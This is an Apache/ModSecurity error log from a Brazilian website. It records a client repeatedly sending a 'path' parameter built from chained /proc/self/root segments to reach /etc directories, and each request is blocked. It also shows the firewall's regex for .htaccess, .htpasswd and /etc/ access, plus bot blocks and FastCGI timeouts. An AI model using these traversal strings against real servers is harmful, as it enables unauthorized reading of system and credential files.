https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 08:44:09.151707 2026] [proxy_fcgi:error] [pid 27293:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:36546] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:44:15.389529 2026] [:error] [pid 30077:tid 140411624429312] [client 74.7.243.128:53914] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvhj_u8EFLIOrSqIpuTcgAAAk4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 08:44:33.457883 2026] [proxy_fcgi:error] [pid 30077:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:37132] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:44:37.325424 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.243.128:53922] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvho9a6ubjKNq_cu4Y98gAAA0Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 08:44:40.814608 2026] [:error] [pid 27403:tid 140411540502272] [client 74.7.244.43:33566] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvhqBkFeYa1D6dYQnDfzQAAAdg"]
[Thu Mar 19 08:44:55.608624 2026] [:error] [pid 14269:tid 140411599251200] [client 74.7.243.128:38790] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvhtwbLMZ6AikZjR9VM7QAAABE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 08:44:59.141883 2026] [proxy_fcgi:error] [pid 14269:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:37836] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:45:21.025835 2026] [proxy_fcgi:error] [pid 19093:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:38434] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:45:43.115544 2026] [proxy_fcgi:error] [pid 14269:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:38994] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:46:04.494464 2026] [proxy_fcgi:error] [pid 19093:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:39526] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:46:27.169778 2026] [proxy_fcgi:error] [pid 17887:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:40198] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:46:36.216790 2026] [:error] [pid 19093:tid 140411699963648] [client 74.7.243.128:34370] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abviHF_V7PWP6ixUYl6tJgAAAoU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 08:46:38.644715 2026] [:error] [pid 17653:tid 140411725141760] [client 74.7.243.128:42846] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abviHsdf6f5d65gmYZRk8gAAAsI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 08:46:43.075128 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.243.128:46550] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abviI9a6ubjKNq_cu4Y-MwAAA0o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 08:46:50.125784 2026] [proxy_fcgi:error] [pid 17887:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:40778] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:47:17.141819 2026] [proxy_fcgi:error] [pid 17887:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:41412] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:47:30.850859 2026] [:error] [pid 15826:tid 140411716749056] [client 74.7.228.61:46606] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abviUuoXxyEfFpUF8f__fgAAAUM"]
[Thu Mar 19 08:47:39.130050 2026] [proxy_fcgi:error] [pid 15826:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:41940] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:47:49.613442 2026] [:error] [pid 27403:tid 140411565680384] [client 74.7.243.128:46564] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abviZRkFeYa1D6dYQnDgaAAAAdU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 08:48:00.343280 2026] [:error] [pid 17887:tid 140411641214720] [client 74.7.243.128:56598] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvicAkwaGbbGflqUZCuJAAAAMw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 08:48:02.155151 2026] [proxy_fcgi:error] [pid 26799:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:42568] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:48:15.139536 2026] [:error] [pid 14269:tid 140411708356352] [client 74.7.243.128:57126] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvifwbLMZ6AikZjR9VNWgAAAAQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 08:48:26.149798 2026] [proxy_fcgi:error] [pid 27403:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:43134] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:48:49.127873 2026] [proxy_fcgi:error] [pid 14269:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:43652] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:49:02.689359 2026] [:error] [pid 19093:tid 140411624429312] [client 74.7.243.128:33736] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvirl_V7PWP6ixUYl6tYgAAAo4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 08:49:14.125795 2026] [proxy_fcgi:error] [pid 27293:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:44324] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:49:37.421773 2026] [proxy_fcgi:error] [pid 27403:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:44808] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:49:44.117374 2026] [:error] [pid 31803:tid 140411641214720] [client 74.7.244.43:45946] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvi2OyqAr6etmhZHNpS6AAAAEw"]
[Thu Mar 19 08:50:00.529784 2026] [proxy_fcgi:error] [pid 17887:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:45328] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:50:29.045854 2026] [proxy_fcgi:error] [pid 26799:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:45942] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:50:53.547869 2026] [:error] [pid 30077:tid 140411540502272] [client 74.7.243.128:44638] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvjHfu8EFLIOrSqIpuU3wAAAlg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 08:50:56.121355 2026] [proxy_fcgi:error] [pid 30077:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:46592] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:51:01.009413 2026] [:error] [pid 30077:tid 140411590858496] [client 74.7.243.128:46552] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvjJfu8EFLIOrSqIpuU5wAAAlI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 08:51:07.172697 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.243.128:46566] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvjK-oXxyEfFpUF8f__2wAAAVE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 08:51:14.079537 2026] [:error] [pid 17887:tid 140411557287680] [client 74.7.243.128:33612] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvjMgkwaGbbGflqUZCu0gAAANY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 08:51:22.489838 2026] [proxy_fcgi:error] [pid 27293:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:47182] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:51:27.517599 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.243.128:39796] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvjP9a6ubjKNq_cu4Y-9AAAA0s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 08:51:40.763627 2026] [:error] [pid 27293:tid 140411590858496] [client 74.7.243.128:53354] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvjTP-YZRR_7pZ7nDJ92wAAA9I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 08:51:46.128632 2026] [proxy_fcgi:error] [pid 30077:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:47888] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:52:09.121845 2026] [proxy_fcgi:error] [pid 17653:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:48502] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:52:31.149832 2026] [proxy_fcgi:error] [pid 27293:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:49184] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:52:31.855167 2026] [:error] [pid 30077:tid 140411666392832] [client 74.7.228.61:57820] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvjf_u8EFLIOrSqIpuVLAAAAkk"]
[Thu Mar 19 08:52:42.886263 2026] [:error] [pid 17887:tid 140411632822016] [client 74.7.243.128:50054] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvjigkwaGbbGflqUZCu_QAAAM0"], referer: 